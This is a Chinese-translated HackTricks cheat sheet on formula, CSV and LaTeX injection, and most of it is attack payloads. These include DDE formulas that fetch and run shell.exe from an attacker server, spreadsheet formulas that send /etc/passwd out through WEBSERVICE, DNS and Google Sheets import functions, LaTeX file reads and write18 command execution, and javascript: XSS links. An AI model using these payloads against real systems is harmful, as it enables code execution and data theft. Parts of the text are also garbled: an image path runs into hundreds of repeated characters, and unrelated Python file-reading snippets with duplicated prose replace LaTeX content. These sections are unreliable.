hacktricks/pentesting-web/formula-doc-latex-injection.md

269 lines
18 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 公式/CSV/文档/LaTeX注入
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
找到最重要的漏洞以便您可以更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术堆栈中的问题从API到Web应用程序和云系统。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## 公式注入
### 信息
如果您的**输入**被**反射**到**CSV文件**(或任何其他可能被**Excel**打开的文件您可能可以放置Excel**公式**,当用户**打开文件**或用户**在Excel表格中点击某个链接**时,这些公式将被**执行**。
{% hint style="danger" %}
现在的**Excel会警告**(多次)**用户当从Excel外部加载内容时**,以防止他进行恶意操作。因此,必须对社会工程学进行特殊努力以获得最终有效载荷。
{% endhint %}
### [字典](https://github.com/payloadbox/csv-injection-payloads)
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
### 超链接
**以下示例非常有用可以从最终的Excel表中窃取内容并向任意位置发送请求。但是需要用户点击链接并接受警告提示。**
示例来自[https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
让我们假设一个学校的学生记录管理系统的攻击场景。该应用程序允许教师输入学生的详细信息。攻击者获得了对应用程序的访问权限并希望所有使用该应用程序的教师都受到威胁。因此攻击者尝试通过Web应用程序执行CSV注入攻击。\
攻击者需要窃取其他学生的详细信息。因此,攻击者在输入学生详细信息时使用了超链接公式。
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_008.png)
当教师导出CSV并点击超链接时敏感数据将被发送到攻击者的服务器。
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_009.png)
导出的CSV文件中包含恶意有效负载。
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_010.png)
学生详细信息被记录在攻击者的Web服务器中。
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)
### RCE
为了使此示例工作,**需要启用以下配置**\
文件 → 选项 → 信任中心 → 信任中心设置 → 外部内容 → 启用动态数据交换服务器启动\
或使用**旧版本的Excel**。
好消息是,**当打开文件时,此有效负载会自动执行**(如果用户接受警告)。
可以使用以下有效负载执行计算器 **`=cmd|' /C calc'!xxx`**
![](<../.gitbook/assets/image (25) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### LFI
**LibreOffice Calc**
* 这将从本地的/etc/passwd文件中读取第一行`='file:///etc/passwd'#$passwd.A1`
* 将其外泄`=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* 外泄多行`=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS外泄`=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**分析DNS外泄负载**
* file:///etc/passwd#$passwd.A19 将从本地的/etc/passwd文件中读取第19行
* ENCODEURL(file:///etc/passwd#$passwd.A19) 对返回的数据进行URL编码
* MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41) 类似于子字符串从第一个字符到第41个字符读取数据这是一种非常方便的限制DNS主机名长度的方法FQDN的字符限制为254个字符标签的字符限制为63个字符即子域名
* SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“) 将所有%URL编码的特殊字符的实例替换为破折号以确保只使用有效的DNS字符
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(file:///etc/passwd#$passwd.A19)),1,41),”%”,”-“)),”.\<FQDN>”) 将文件的输出在进行上述处理后与FQDN我们可以控制的域的权威主机连接起来
* WEBSERVICE 将请求此不存在的DNS名称然后我们可以解析DNS权威名称服务器上的日志或运行tcpdump等而我们对该服务器具有控制权
### Google Sheets OOB数据外泄
首先,让我们介绍一些更有趣的函数。
**CONCATENATE**: 将字符串连接在一起。
```
=CONCATENATE(A2:E2)
```
**IMPORTXML**: 从各种结构化数据类型中导入数据包括XML、HTML、CSV、TSV以及RSS和ATOM XML订阅源。
```
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```
**IMPORTFEED**: 导入一个RSS或ATOM订阅源。
```
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```
**IMPORTHTML**: 从HTML页面中导入表格或列表中的数据。
```
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```
**IMPORTRANGE**: 从指定的电子表格中导入一系列单元格。
```
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
**图片**:将图片插入到单元格中。
```
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
## LaTeX注入
通常在互联网上找到的将LaTeX代码转换为PDF的服务器使用`pdflatex`。\
该程序使用3个主要属性来禁止允许命令执行
- `--no-shell-escape`即使在texmf.cnf文件中启用了`\write18{command}`构造,也会**禁用**它。
- `--shell-restricted`:与`--shell-escape`相同,但仅限于一组**预定义**的“安全”命令在Ubuntu 16.04上,列表位于`/usr/share/texmf/web2c/texmf.cnf`中)。
- `--shell-escape`:启用`\write18{command}`构造。该命令可以是任何shell命令。出于安全原因通常禁止使用此构造。
然而还有其他执行命令的方法因此为了避免远程命令执行RCE使用`--shell-restricted`非常重要。
### 读取文件 <a href="#read-file" id="read-file"></a>
您可能需要使用\[或$等包装器来调整注入。
```bash
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
#### 读取单行文件
To read a single line from a file, you can use the `readline()` function in Python. This function reads one line at a time from the file and returns it as a string.
```python
file = open('filename.txt', 'r')
line = file.readline()
print(line)
file.close()
```
The code above opens the file `filename.txt` in read mode (`'r'`), reads the first line using `readline()`, and then prints the line. Finally, the file is closed using the `close()` method.
You can replace `'filename.txt'` with the path to your desired file.
```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
#### 读取多行文件
To read a file that contains multiple lines, you can use the following code:
要读取包含多行的文件,可以使用以下代码:
```python
with open('file.txt', 'r') as file:
lines = file.readlines()
for line in lines:
print(line.strip())
```
This code opens the file named `file.txt` in read mode (`'r'`) and uses the `readlines()` method to read all the lines in the file. The lines are then printed one by one using a loop. The `strip()` method is used to remove any leading or trailing whitespace from each line.
这段代码以读取模式(`'r'`)打开名为 `file.txt` 的文件,并使用 `readlines()` 方法读取文件中的所有行。然后使用循环逐行打印这些行。`strip()` 方法用于删除每行开头和结尾的空白字符。
By using this code, you can easily read and process files that contain multiple lines of text.
使用这段代码,您可以轻松读取和处理包含多行文本的文件。
```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
### 写入文件 <a href="#write-file" id="write-file"></a>
```bash
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
### 命令执行 <a href="#command-execution" id="command-execution"></a>
命令的输入将被重定向到标准输入(stdin),使用临时文件来获取它。
```bash
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
如果遇到任何LaTex错误请考虑使用base64来获取结果以避免不良字符的影响。
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```bash
\input|ls|base4
\input{|"/bin/hostname"}
```
### 跨站脚本攻击 <a href="#cross-site-scripting" id="cross-site-scripting"></a>
来自[@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)的信息
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
## 参考资料
* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
找到最重要的漏洞以便更快地修复它们。Intruder跟踪您的攻击面运行主动威胁扫描发现整个技术堆栈中的问题从API到Web应用程序和云系统。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 您在**网络安全公司**工作吗您想在HackTricks中看到您的**公司广告**吗?或者您想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
</details>